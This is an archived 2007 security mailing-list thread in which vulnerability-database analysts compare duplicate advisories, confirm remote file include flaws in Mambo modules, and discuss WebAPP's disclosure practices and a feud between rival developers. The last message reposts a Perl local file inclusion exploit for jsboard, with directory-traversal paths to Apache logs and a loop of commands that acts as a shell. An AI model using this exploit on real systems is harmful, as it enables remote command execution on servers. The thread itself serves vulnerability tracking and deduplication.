The name transition to marc.info has kicked in. All old links to
http://marc.theaimsgroup.com/foo will still work, but will result in a 301
redirect to the new corresponding URL. Wherever possible/convenient, please
update your links in documentation, support web pages, etc to point to the
new name. But, old links will continue to work indefinitely.

[...]

2007-03-08

MARC is changing domain names! The site will soon switch to being marc.info,
instead of marc.theaimsgroup.com. Links to the old URLs will still work, for
the Internet definition of forever; they'll just get redirected.

Several reasons for this. First, it's shorter, and I am a huge fan of short
URLs. Second, The AIMS Group, the company that originally[*] sponsored MARC,
ceased to exist a long time ago. The same people have been 10 East for years
now, and have continued co-hosting MARC, but the old name,
marc.theaimsgroup.com was already embedded in all kinds of project
documentation, etc, so I was reluctant to change it. But it is time for MARC
to be established as its own entity.

[*] Actually, the first sponsor was Progressive Computer Concepts, which was
the company name in the mid-90's before they became AIMS.

http://marc.info/?q=news

From coley at linus.mitre.org  Wed Mar 21 18:50:09 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Wed, 21 Mar 2007 14:50:09 -0400 (EDT)
Subject: [VIM] WebAPP Audit
In-Reply-To: <000801c76bda$e0da6480$0500a8c0@hsd1.wa.comcast.net>
References: <003b01c76afa$b0430920$0500a8c0@hsd1.wa.comcast.net> <000801c76bda$e0da6480$0500a8c0@hsd1.wa.comcast.net>

On Wed, 21 Mar 2007, WebAPP wrote:

> Guys, It's not very helpful to read about how people have found exploits
> and not be told what they are. We're trying our best at web-app.org to
> catch up with long neglected security issues. Any information you might
> have would be helpful.
George, is he talking about your claim yesterday that you found some holes in
an older version?

- Steve

From theall at tenablesecurity.com  Thu Mar 22 01:55:27 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Wed, 21 Mar 2007 21:55:27 -0400
Subject: [VIM] WebAPP Audit
In-Reply-To: <000801c76bda$e0da6480$0500a8c0@hsd1.wa.comcast.net>
References: <003b01c76afa$b0430920$0500a8c0@hsd1.wa.comcast.net> <000801c76bda$e0da6480$0500a8c0@hsd1.wa.comcast.net>
Message-ID: <4601E20F.8090606@tenablesecurity.com>

On 03/21/07 13:03, WebAPP wrote:
> Guys, It's not very helpful to read about how people have found exploits
> and not be told what they are.

Are you referring to my posting yesterday? If so, perhaps it would help if I
rephrased...

In looking at the code changes between 0.9.9.5 and 0.9.9.6, I found two
vulnerabilities that had been patched and that allowed for arbitrary code
execution by an authenticated user. These are issues that have already been
identified and fixed in 0.9.9.6. Understand that this was a review of the
*changes* made, not a code audit itself.

You asked in an earlier message what we would like to see with regards to
security information from your project. I'm a bit surprised not to have seen
at least Jericho rise to the challenge, but personally I'd like to see more
information. Telling people that there's a serious set of flaws in a software
package and that they need to upgrade asap might seem helpful at first blush,
but in today's environment, people need a way to prioritize. Give them basic
information about the flaws so they can understand the risks involved in not
reacting right away. Are we dealing with a cross-site scripting flaw that can
be triggered when an admin views application logs? A remote file include flaw
that's exploitable only if PHP's register_globals is enabled (yeah, I know
WebAPP uses Perl, not PHP, but I'm talking generally here)? A SQL injection in
a login page by which an attacker can gain admin access?
A design flaw by which the shopping cart's sales database is in a
web-accessible location? A feature that lets users upload arbitrary
files and then run them as a non-root user? This sort of information
will go a long way to helping your users assess the risks they face.

P.S. I wouldn't be surprised if telling people they really Really REALLY
need to upgrade motivates malicious people to discover what's been
patched more than it convinces others to upgrade their own systems.

George
-- 
theall at tenablesecurity.com

From webapp at sitespot.us Thu Mar 22 05:40:34 2007
From: webapp at sitespot.us (WebAPP)
Date: Wed, 21 Mar 2007 21:40:34 -0800
Subject: [VIM] WebAPP Audit
References: <003b01c76afa$b0430920$0500a8c0@hsd1.wa.comcast.net>
 <000801c76bda$e0da6480$0500a8c0@hsd1.wa.comcast.net>
 <4601E20F.8090606@tenablesecurity.com>
Message-ID: <000e01c76c44$9ce24940$0500a8c0@hsd1.wa.comcast.net>

Now this is helpful. Thank you George. Also it's good news to hear that
you found the differences and see our patches to be at least somewhat
appropriate.

I understand what you mean about potential hackers figuring out the
problem before the users. Lately the biggest threat has been from
advocates of an opposing group who does not want web-app.org to survive
(who incidentally still do not have their release patched). But still of
course there are others. We were careful with this one and sent out a
newsletter security bulletin to subscribers over a week ahead of time
telling of the coming update. We held back the exact information on the
vulnerable area and did not release a separate patch for the specific
issue because it can be so deadly and because of the typical hesitance
of most WebAPP users to upgrade. Many of them are still running versions
from 2003, and you've probably heard of a few of the security issues
we've had to clean up since then.

Having seen the vulnerability now for yourself, what is your opinion on
making a report of it?

As for the Secunia Advisory at http://secunia.com/advisories/24227 , I
will forward to you a copy of what I originally emailed to
vuln at secunia.com . I assumed the Advisory to be a result of my report.
Not sure why Secunia's description is so much shorter.

*****

Hello,

WebAPP (Web Automated Perl Portal) has recently had a security audit.
Several issues were uncovered, including the following:

Form input validation flaws.
It was found possible to insert certain characters in order to obtain
unexpected results from form submissions. Data files could be corrupted
by percent encoded or otherwise escaped character insertion. Under
certain conditions, forms could be exploited to allow undesired access
to private files. With expert use, this could be exploited to execute
code on the host server.

Cross Site Scripting vulnerabilities in Drop Downs.
XSS strings entered in the URL query string could cause javascript alert
execution in the user's browser.

Various Cross Site Scripting vulnerabilities.
Submission of various forms could cause javascript alert execution in
the user's browser when viewing the form results pages.

Data Corruption by query string manipulation.
Query strings could be crafted to open files and write with the wrong
data.

File type validation flaws.
It was possible to inject files of unknown types onto the host server by
manipulating the file name and/or using percent encoding in forms.

Impact:
Cross Site Scripting
Manipulation of data
Exposure of sensitive information
System access

Any real exploits for the above issues are possible for registered site
members only and require authorization, thus implying a trust factor,
and they are logged. Most of the cross site scripting issues are client
side only.

There is a new security upgrade release of WebAPP v0.9.9.6 available at
http://www.web-app.org/cgi-bin/index.cgi?action=downloads&cat=curstable ,
to deal with all of the above mentioned issues.

Regards,
WebAPP
www.web-app.org

*****

----- Original Message -----
From: "George A. Theall"
To: "Vulnerability Information Managers"
Sent: Wednesday, March 21, 2007 5:55 PM
Subject: Re: [VIM] WebAPP Audit

> On 03/21/07 13:03, WebAPP wrote:
>
> > Guys, It's not very helpful to read about how people have found exploits
> > and not be told what they are.
>
> Are you referring to my posting yesterday? If so, perhaps it would help
> if I rephrased... In looking at the code changes between 0.9.9.5 and
> 0.9.9.6, I found two vulnerabilities that had been patched and that
> allowed for arbitrary code execution by an authenticated user. These are
> issues that have already been identified and fixed in 0.9.9.6.
> Understand that this was a review of the *changes* made, not a code
> audit itself.
>
> You asked in an earlier message what we would like to see with regards
> to security information from your project. I'm a bit surprised not to
> have seen at least Jericho rise to the challenge, but personally I'd
> like to see more information. Telling people that there's a serious set
> of flaws in a software package and that they need to upgrade asap might
> seem helpful at first blush, but in today's environment, people need a
> way to prioritize. Give them basic information about the flaws so they
> can understand the risks involved in not reacting right away. Are we
> dealing with a cross-site scripting flaw that can be triggered when an
> admin views application logs? A remote file include flaw that's
> exploitable only if PHP's register_globals is enabled (yeah, I know
> WebAPP uses Perl, not PHP, but I'm talking generally here)? A SQL
> injection in a login page by which an attacker can gain admin access? A
> design flaw by which the shopping cart's sales database is in a
> web-accessible location? A feature that lets users upload arbitrary
> files and then run them as a non-root user?
This sort of information
> will go a long way to helping your users assess the risks they face.
>
> P.S. I wouldn't be surprised if telling people they really Really REALLY
> need to upgrade motivates malicious people to discover what's been
> patched more than it convinces others to upgrade their own systems.
>
>
> George
> -- 
> theall at tenablesecurity.com
>

From theall at tenablesecurity.com Thu Mar 22 23:59:25 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Thu, 22 Mar 2007 19:59:25 -0400
Subject: [VIM] WebAPP Audit
In-Reply-To: <000e01c76c44$9ce24940$0500a8c0@hsd1.wa.comcast.net>
References: <003b01c76afa$b0430920$0500a8c0@hsd1.wa.comcast.net>
 <000801c76bda$e0da6480$0500a8c0@hsd1.wa.comcast.net>
 <4601E20F.8090606@tenablesecurity.com>
 <000e01c76c44$9ce24940$0500a8c0@hsd1.wa.comcast.net>
Message-ID: <4603185D.9090808@tenablesecurity.com>

On 03/22/07 01:40, WebAPP wrote:

> WebAPP (Web Automated Perl Portal) has recently had a security audit.
> Several issues were uncovered, including the following:
>
> Form input validation flaws.
> It was found possible to insert certain characters in order to obtain
> unexpected results from form submissions. Data files could be corrupted by
> percent encoded or otherwise escaped character insertion. Under certain
> conditions, forms could be exploited to allow undesired access to private
> files. With expert use, this could be exploited to execute code on the host
> server.

This sort of information is much more useful. The only thing I would add
would be whether an attacker must be authenticated to exploit the more
serious flaws. I'd hope you ultimately will post that on your site so
your users can understand the risks.

George
-- 
theall at tenablesecurity.com

From theall at tenablesecurity.com Fri Mar 23 20:50:03 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Fri, 23 Mar 2007 16:50:03 -0400
Subject: [VIM] Mambo Module uhp 0.3 (uhp_config.php) Remote File Inclusion Exploit
Message-ID: <46043D7B.3080103@tenablesecurity.com>

After last summer's blitz, any remote file include issue published
nowadays and involving mosConfig_absolute_path raises suspicions in my
mind. So when I saw today's announcement of one affecting the User Home
Pages (UHP) module, I looked a bit... Turns out it's the same as what
kurdish security published last summer. Compare for yourself:

Old: kurdishsecurity.blogspot.com/2006/07/kurdish-security-15-user-home-pges.html
New: http://milw0rm.com/exploits/3553

Or am I just overlooking something?

George
-- 
theall at tenablesecurity.com

From coley at linus.mitre.org Fri Mar 23 21:09:39 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Fri, 23 Mar 2007 17:09:39 -0400 (EDT)
Subject: [VIM] Mambo Module uhp 0.3 (uhp_config.php) Remote File Inclusion Exploit
In-Reply-To: <46043D7B.3080103@tenablesecurity.com>
References: <46043D7B.3080103@tenablesecurity.com>
Message-ID:

On Fri, 23 Mar 2007, George A. Theall wrote:

> After last summer's blitz, any remote file include issue published
> nowadays and involving mosConfig_absolute_path raises suspicions in my
> mind.

Really? Hmmm. Since mosConfig_absolute_path is clearly associated with
arbitrary third-party modules (like phpbb_home_path is for PHPBB), I'm
not always going to be suspicious - since there's been enough evidence
that many module developers don't actually add the required
anti-direct-request check. i.e.:

1) third-party modules for Mambo/Joomla apparently require that
   mosConfig_absolute_path is set

2) Proper integration of the module into the environment apparently
   suggests protection against direct request using defined('_VALID_MOS')

3) Predictably, lots of module developers don't do step 2. We've got
   over 30 CVE's for different modules.

4) Therefore mosConfig_absolute_path is a valid RFI vector for those
   modules (with the usual disclaimers), and is also all over the place
   because of the raw number of modules for mambo/joomla.

5) Similar rationale holds for PHPBB modules.

6) crackers_child and others aside, this seems like a legitimate issue.

The source code for uhp_config.php says:

  define ("_uhp_TITLE","User Home Pages");
  ...
  global $mosConfig_absolute_path;
  require($mosConfig_absolute_path."/administrator/components/com_uhp/uhp_config.inc");

which sure looks like legit RFI to me.

And, as you said, sure looks the same as last year's. But this kind of
rediscovery is not surprising.

- Steve

From theall at tenablesecurity.com Fri Mar 23 21:14:52 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Fri, 23 Mar 2007 17:14:52 -0400
Subject: [VIM] Helix Server LoadTestPassword Overflow
Message-ID: <4604434C.5090800@tenablesecurity.com>

Has anyone had a chance to look at the buffer overflow in Helix Server
covered by Evgeny Legerov (http://gleg.net/helix.txt)? SecurityFocus
assigned it a new BID (23068) but it looks suspiciously like the same
flaw covered by BID 21141 / CVE-2006-6026 from last November. The
earlier entries both are for the open-source Helix DNA Server while the
newer one is for RealNetwork's Helix Server. While Legerov's advisory
talks only of "Helix Server", it references a CVS commit message for the
open-source variant, which in turn cross-references BID 21141.

Oddly, though, the description SecurityFocus has for the earlier BID
says "The vendor refutes this issue, stating that the report is
unsubstantiated". Does this mean the vendor (whichever) simply didn't
have details for an exploit? Legerov claims to have notified the vendor
in December...

Btw, I've tested Legerov's PoC against both Helix DNA Server 11.1 and
Helix Server 11.1.2 on Windows; it crashes both so I suspect the answer
to my question is "yes".
George
-- 
theall at tenablesecurity.com

From coley at mitre.org Fri Mar 23 21:16:42 2007
From: coley at mitre.org (Steven M. Christey)
Date: Fri, 23 Mar 2007 17:16:42 -0400 (EDT)
Subject: [VIM] Root cause of NPDS SQL injection is variable extraction/evaluation
Message-ID: <200703232116.l2NLGg7B026632@faron.mitre.org>

Researcher: DarkFig
Ref: Net Portal Dynamic System (NPDS) <= 5.10 Remote Code Execution 0day
http://www.securityfocus.com/archive/1/archive/1/463176/100/0/threaded

Granted the layout isn't optimal, but he excerpts the relevant source
code for each step of the exploit - actually pretty cool.

Anyway, here's my rough analysis:

1) line 31 of print.php uses $DB variable in a query.

2) grab_globals.php shows a whole bunch of juicy extract() goodness with
   EXTR_OVERWRITE, so we get to modify nearly-arbitrary variables
   including whatever superglobal the relevant PHP version isn't
   protecting. So, _FILES[DB][tmp_name] is overwritten in line 83.

3) Lines 133-134 in grab_globals.php do the dynamic variable evaluation;
   looping through the values of _FILES[], we wind up processing
   _FILES[DB], setting $$DB = _FILES[DB][tmp_name] .

4) I didn't investigate any further, but it wouldn't be surprising if
   there were other attacks using the extract capability.

- Steve

From theall at tenablesecurity.com Fri Mar 23 21:18:58 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Fri, 23 Mar 2007 17:18:58 -0400
Subject: [VIM] Mambo Module uhp 0.3 (uhp_config.php) Remote File Inclusion Exploit
In-Reply-To:
References: <46043D7B.3080103@tenablesecurity.com>
Message-ID: <46044442.9020903@tenablesecurity.com>

On 03/23/07 17:09, Steven M. Christey wrote:

>> After last summer's blitz, any remote file include issue published
>> nowadays and involving mosConfig_absolute_path raises suspicions in
>> my mind.
>
> Really? Hmmm. Since mosConfig_absolute_path is clearly associated
> with arbitrary third-party modules (like phpbb_home_path is for
> PHPBB), I'm not always going to be suspicious

I apologize - I was being sarcastic. It seemed like everybody and his
brother was testing Mambo modules for this flaw last summer and hence
unlikely that one was missed.

> which sure looks like legit RFI to me.
>
> And, as you said, sure looks the same as last year's. But this kind of
> rediscovery is not surprising.

I'm not denying the flaw exists, only expressing surprise it slipped by
SecurityFocus and especially str0ke.

George
-- 
theall at tenablesecurity.com

From coley at linus.mitre.org Fri Mar 23 21:33:01 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Fri, 23 Mar 2007 17:33:01 -0400 (EDT)
Subject: [VIM] Helix Server LoadTestPassword Overflow
In-Reply-To: <4604434C.5090800@tenablesecurity.com>
References: <4604434C.5090800@tenablesecurity.com>
Message-ID:

On Fri, 23 Mar 2007, George A. Theall wrote:

> Has anyone had a chance to look at the buffer overflow in Helix Server
> covered by Evgeny Legerov (http://gleg.net/helix.txt)? SecurityFocus
> assigned it a new BID (23068) but it looks suspiciously like the same
> flaw covered by BID 21141 / CVE-2006-6026 from last November.

I glanced at it too, it looks very similar. Only Legerov can confirm for
sure, I'd bet.

> Oddly, though, the description SecurityFocus has for the earlier BID
> says "The vendor refutes this issue, stating that the report is
> unsubstantiated". Does this mean the vendor (whichever) simply didn't
> have details for an exploit? Legerov claims to have notified the vendor
> in December...

Interestingly, he also says it had been in the pack since February 2006.
This was widely public around November 2006.

Internal CVE notes also suggest that "Helix Server and Helix DNA Server
are not the same. Helix Server is described on realnetworks.com and seems
to require a purchase. Helix DNA Server is described on
helixcommunity.org and seems to allow free source-code downloads after
registration."

- Steve

From coley at linus.mitre.org Fri Mar 23 21:38:46 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Fri, 23 Mar 2007 17:38:46 -0400 (EDT)
Subject: [VIM] Mambo Module uhp 0.3 (uhp_config.php) Remote File Inclusion Exploit
In-Reply-To: <46044442.9020903@tenablesecurity.com>
References: <46043D7B.3080103@tenablesecurity.com>
 <46044442.9020903@tenablesecurity.com>
Message-ID:

On Fri, 23 Mar 2007, George A. Theall wrote:

> I'm not denying the flaw exists, only expressing surprise it slipped by
> SecurityFocus and especially str0ke.

Give str0ke a break, for he has yet to feel the pain of institutional
amnesia that comes when you hit a few thousand vulnerabilities ;-) I
know we sometimes introduce dupes in CVE because of rediscoveries of old
issues that we forget to check (or that aren't indexed under alternate
product/vendor spellings).

- Steve

From str0ke at milw0rm.com Fri Mar 23 21:54:53 2007
From: str0ke at milw0rm.com (str0ke)
Date: Fri, 23 Mar 2007 15:54:53 -0600
Subject: [VIM] Mambo Module uhp 0.3 (uhp_config.php) Remote File Inclusion Exploit
In-Reply-To:
References: <46043D7B.3080103@tenablesecurity.com>
 <46044442.9020903@tenablesecurity.com>
Message-ID: <814b9d50703231454q11f3a87bo8803bb259153e239@mail.gmail.com>

Appreciate the info guys.

http://milw0rm.com/exploits/3553 << has been removed due to the
duplicate here.

http://www.milw0rm.com/exploits/2089

/str0ke

On 3/23/07, Steven M. Christey wrote:
>
> On Fri, 23 Mar 2007, George A. Theall wrote:
>
> > I'm not denying the flaw exists, only expressing surprise it slipped by
> > SecurityFocus and especially str0ke.
>
> Give str0ke a break, for he has yet to feel the pain of institutional
> amnesia that comes when you hit a few thousand vulnerabilities ;-) I know
> we sometimes introduce dupes in CVE because of rediscoveries of old issues
> that we forget to check (or that aren't indexed under alternate
> product/vendor spellings).
>
> - Steve
>

From theall at tenablesecurity.com Fri Mar 23 23:06:12 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Fri, 23 Mar 2007 19:06:12 -0400
Subject: [VIM] Mambo Module uhp 0.3 (uhp_config.php) Remote File Inclusion Exploit
In-Reply-To:
References: <46043D7B.3080103@tenablesecurity.com>
 <46044442.9020903@tenablesecurity.com>
Message-ID: <46045D64.4050304@tenablesecurity.com>

On 03/23/07 17:38, Steven M. Christey wrote:

> Give str0ke a break,

Oh, I'm not complaining -- I appreciate his work. And yours. And
jericho's. I'm constantly referring to all three of your sites. You're
all awesome!

> for he has yet to feel the pain of institutional
> amnesia that comes when you hit a few thousand vulnerabilities ;-)

Don't you mean several tens of thousands?

George
-- 
theall at tenablesecurity.com

From coley at linus.mitre.org Fri Mar 23 23:09:49 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Fri, 23 Mar 2007 19:09:49 -0400 (EDT)
Subject: [VIM] Mambo Module uhp 0.3 (uhp_config.php) Remote File Inclusion Exploit
In-Reply-To: <46045D64.4050304@tenablesecurity.com>
References: <46043D7B.3080103@tenablesecurity.com>
 <46044442.9020903@tenablesecurity.com>
 <46045D64.4050304@tenablesecurity.com>
Message-ID:

On Fri, 23 Mar 2007, George A. Theall wrote:

> > for he has yet to feel the pain of institutional
> > amnesia that comes when you hit a few thousand vulnerabilities ;-)
>
> Don't you mean several tens of thousands?

That is unspeakable pain, so it's self-explanatory why I didn't mention
it :)

- Steve

From theall at tenablesecurity.com Fri Mar 23 23:19:22 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Fri, 23 Mar 2007 19:19:22 -0400
Subject: [VIM] Helix Server LoadTestPassword Overflow
In-Reply-To:
References: <4604434C.5090800@tenablesecurity.com>
Message-ID: <4604607A.6070108@tenablesecurity.com>

On 03/23/07 17:33, Steven M. Christey wrote:

> I glanced at it too, it looks very similar. Only Legerov can confirm for
> sure, I'd bet.

Or the vendors. Perhaps. I'll shoot Legerov an email.

> Internal CVE notes also suggest that "Helix Server and Helix DNA Server
> are not the same. Helix Server is described on realnetworks.com and seems
> to require a purchase. Helix DNA Server is described on helixcommunity.org
> and seems to allow free source-code downloads after registration."

Yeah, I realize that. But I don't understand the ambiguities in
Legerov's advisory.

George
-- 
theall at tenablesecurity.com

From theall at tenablesecurity.com Sat Mar 24 11:55:51 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Sat, 24 Mar 2007 07:55:51 -0400
Subject: [VIM] Helix Server LoadTestPassword Overflow
In-Reply-To: <4604607A.6070108@tenablesecurity.com>
References: <4604434C.5090800@tenablesecurity.com>
 <4604607A.6070108@tenablesecurity.com>
Message-ID: <460511C7.6040800@tenablesecurity.com>

On 03/23/07 19:19, George A. Theall wrote:

> On 03/23/07 17:33, Steven M. Christey wrote:
>
>> I glanced at it too, it looks very similar. Only Legerov can confirm for
>> sure, I'd bet.
>
> Or the vendors. Perhaps. I'll shoot Legerov an email.

Evgeny confirmed in a private email that the issues (ie, BIDs 21141 and
23068) are the same.
George
-- 
theall at tenablesecurity.com

From webapp at sitespot.us Sat Mar 24 19:36:55 2007
From: webapp at sitespot.us (WebAPP)
Date: Sat, 24 Mar 2007 11:36:55 -0800
Subject: [VIM] WebAPP Audit
References: <003b01c76afa$b0430920$0500a8c0@hsd1.wa.comcast.net>
 <000801c76bda$e0da6480$0500a8c0@hsd1.wa.comcast.net>
 <4601E20F.8090606@tenablesecurity.com>
 <000e01c76c44$9ce24940$0500a8c0@hsd1.wa.comcast.net>
 <4603185D.9090808@tenablesecurity.com>
Message-ID: <000401c76e4b$c810df60$0500a8c0@hsd1.wa.comcast.net>

George, I think that would be a good idea to post on the web-app.org
site this unpublished description of some of the problems in the earlier
WebAPP versions.

Thank you very much, all, for your responses. Your help is much
appreciated.

Jos

----- Original Message -----
From: "George A. Theall"

> This sort of information is much more useful. The only thing I would add
> would be whether an attacker must be authenticated to exploit the more
> serious flaws. I'd hope you ultimately will post that on your site so
> your users can understand the risks.

From coley at mitre.org Sat Mar 24 20:52:39 2007
From: coley at mitre.org (Steven M. Christey)
Date: Sat, 24 Mar 2007 16:52:39 -0400 (EDT)
Subject: [VIM] Vendor ACK for FTPx DoS (CVE-2007-1082)
Message-ID: <200703242052.l2OKqdEf005612@faron.mitre.org>

On March 16, CVE received the following email from the vendor:

> We believe this vulnerability to be addressed in our latest version,
> FTP Explorer 1.0.1.52:
>
> http://www.ftpx.com/downloads/ftpx.exe
>
> Sincerely;
>
> Alan Chavis
> FTPx Corp.

- Steve

From info at web-app.net Sat Mar 24 23:39:50 2007
From: info at web-app.net (info at web-app.net)
Date: Sat, 24 Mar 2007 16:39:50 -0700 (PDT)
Subject: [VIM] WebAPP Audit
Message-ID: <1766.208.97.132.5.1174779590.squirrel@mail.web-app.net>

Hi,

I was searching in google on my name "On Elpeleg" and was shocked to
find this personal attack by Ms. Jos Brown from bantychick.com, claiming
that I had left her site and started my own site.

It is Ms. Jos Brown who happened to be a former developer and a team
member of the original WebAPP group at http://www.web-app.net and
started her spin-off site after she bought the domain several months ago
and not the other way.

Please read this email that was just sent to Secunia concerning that.

Ms. Jos has been posting several other posts around trying to trash me
personally and the WebAPP team. Please disregard her posts.

Thank you

On Elpeleg

-------------------------------

Incorrect/incomplete information concerning security issue

Dear Sirs,

In your article you are recommending your customers to update to WebAPP
versions 0995 and/or 0996 from web-app.org, while it is only these two
spin-off versions provided by the vendor at web-app.org which are really
insecure. This information unfortunately creates a great confusion for
the customers of the original script from http://www.web-app.net . It
would also be important to note that several WebAPP sites using these
"patches" have recently been defaced.

1.) WebAPP original developers team (since 2002) has moved to
http://www.web-app.net over a year ago and developed the current
versions provided both by http://www.web-app.org (spin-off of that
version) and http://www.web-app.net . However, one developer decided to
leave the team (or was rather expelled from the team) and bought the old
domain name www.web-app.org 2-3 months ago. Since then she was trying
very hard to convince everyone that her site still provides the original
script and support by its original team which is not correct. A lookup
at whois history of site changes will provide you proofs of owners
change in web-app.org

Please also see this article:
http://www.web-app.net/cgi-bin/index.cgi?action=viewnews&id=6
(Jos Brown is the new owner of the spin-off site at www.web-app.org ).

2.) All versions released by web-app.org since the above mentioned
developer left the team are insecure, while NONE of the other versions
ever released by the original WebAPP team ( http://www.web-app.net )
have this critical back door that allows users to steal admin/root
access to this server via this back door.

Please see this test by Monty53 (a white hat hacker from Turkey):
http://www.web-app.net/cgi-bin/index.cgi?action=forum&board=public_security&op=display&num=10395

You may contact him for more information at monty53 at gmail.com

He says that he managed to deface all versions mentioned in your
articles as "secure" while failing to do so in any of the original
versions provided by http://www.web-app.net

3.) You define the issue as: "Moderately critical" while in fact it is a
severe critical issue, this is because any user out there can access the
admin control panel and thereby edit/delete/add paths, using the script
as a server and acting as a root on that server. I am not sure you are
aware of that, but this indicates a severe critical security issue.

Should you require more information kindly contact me at
on at web-app.net or call me at 0047 90151475.

Kind regards

On Elpeleg
WebAPP security team
http://www.web-app.net

Copy: WebAPP Security team members

From theall at tenablesecurity.com Mon Mar 26 11:31:04 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Mon, 26 Mar 2007 07:31:04 -0400
Subject: [VIM] Confirm - Mambo 4.5.1 Modules Flatmenu <= 1.07 Remote File Include Exploit
Message-ID: <4607AEF8.20907@tenablesecurity.com>

Like I said before, I'm suspicious of this sort of flaw in Mambo /
Joomla so I installed the software and took a look. Sure enough, the
flaw does exist. In modules/mod_flatmenu.php of 1.0 (beta) Build 07 for
Version 4.5.1, the first line of PHP code is:

  require_once( "$mosConfig_absolute_path/modules/mod_flatmenu.class.php" );

So, if register_globals is enabled, you have a vector for remote file
include attacks.
George
-- 
theall at tenablesecurity.com

From coley at mitre.org Tue Mar 27 18:16:23 2007
From: coley at mitre.org (Steven M. Christey)
Date: Tue, 27 Mar 2007 14:16:23 -0400 (EDT)
Subject: [VIM] "File Upload" seems to be "Free File Hosting"
Message-ID: <200703271816.l2RIGNep023335@faron.mitre.org>

Refs:

BUGTRAQ:20070324 File Upload System V1.0 (AD_BODY_TEMP) multiple file include
http://www.securityfocus.com/archive/1/archive/1/463707/100/0/threaded

This has the same parameter names as previously disclosed issues
CVE-2006-5762, CVE-2006-5763, and CVE-2006-5764. Those CVE's are for
"Free File Hosting 1.1" which is at
http://www.free-php-scripts.net/P/Free_File_Hosting . This URL mentions
a capability "File Upload System" and links to the demo page that's
referenced in the latest Bugtraq post.

So, the issues are the same.

Oh - and source inspection confirms all the vectors listed in the CVE's:

contact.php:22:
forgot_pass.php:3:
login.php:3:
register.php:3:
send.php:29:

- Steve

From theall at tenablesecurity.com Thu Mar 29 10:56:24 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Thu, 29 Mar 2007 06:56:24 -0400
Subject: [VIM] iPhotoAlbum v1.1(header.php)Remote File Include Vulnerability
Message-ID: <460B9B58.30301@tenablesecurity.com>

FYI, the recent advisory about a remote file include issue in
iPhotoAlbum (BID 23189 / http://www.milw0rm.com/exploits/3596) seems to
be already covered by BID 14229 / CVE-2005-2246.

George
-- 
theall at tenablesecurity.com

From str0ke at milw0rm.com Fri Mar 30 21:01:50 2007
From: str0ke at milw0rm.com (str0ke)
Date: Fri, 30 Mar 2007 16:01:50 -0500
Subject: [VIM] true: jsboard 2.0.10(login.php table)Local File Inclusion Exploit
Message-ID: <814b9d50703301401j3f2b3869sf58e88a329d3c47d@mail.gmail.com>

login.php
===============
contains the function parse_query_str();

function parse_query_str()
{
    if(ini_get("register_globals")) return;

    if(count($_GET)) {
        foreach($_GET as $key => $value) {
            global ${$key};
            ${$key} = $value;
        }
    }

    if(count($_POST)) {
        foreach($_POST as $key => $value) {
            global ${$key};
            ${$key} = $value;
        }
    }
}

#################################

So pretty much we just need magic quotes = off so we can NULL the
string.
/str0ke

--------------------------------------------------------

#!/usr/bin/perl
# jsboard 2.0.10(login.php table)Local File Inclusion Exploit
# D.Script: http://kldp.net/frs/download.php/1729/jsboard-2.0.10.tar.gz
#   if($table && file_exists("data/$table/config.php"))
#   { include "data/$table/config.php"; }
# Discovered & Coded by : GolD_M = [Mahmood_ali]
# Contact:HackEr_ at w.Cn
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group

use IO::Socket;
use LWP::Simple;

#ripped
@apache=(
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../../../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);

if (@ARGV < 3) {
print "
===============================================================
# jsboard 2.0.10(login.php table)Local File Inclusion Exploit
#
# Gold.pl [Victim] / (apachepath)
#
# Ex: Gold.pl [Victim] / ../logs/error.log
#
===============================================================
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
#
===============================================================
";
exit();
}

$host=$ARGV[0];
$path=$ARGV[1];
$apachepath=$ARGV[2];

print "Code is injecting in logfiles...\n";
$CODE="";

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connection failed.\n\n";
print $socket "GET ".$path.$CODE." HTTP/1.1\r\n";
print $socket "user-Agent: ".$CODE."\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Connection: close\r\n\r\n";
close($socket);

print "Write END to exit!\n";
print "If not working try another apache path\n\n";
print "[shell] ";
$cmd = ;

while($cmd !~ "END")
{
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connection failed.\n\n";
#now include parameter
print $socket "GET ".$path."login.php?table=".$apache[$apachepath]."%00&cmd=$cmd HTTP/1.1\r\n";
print $socket "Host: ".$host."\r\n";
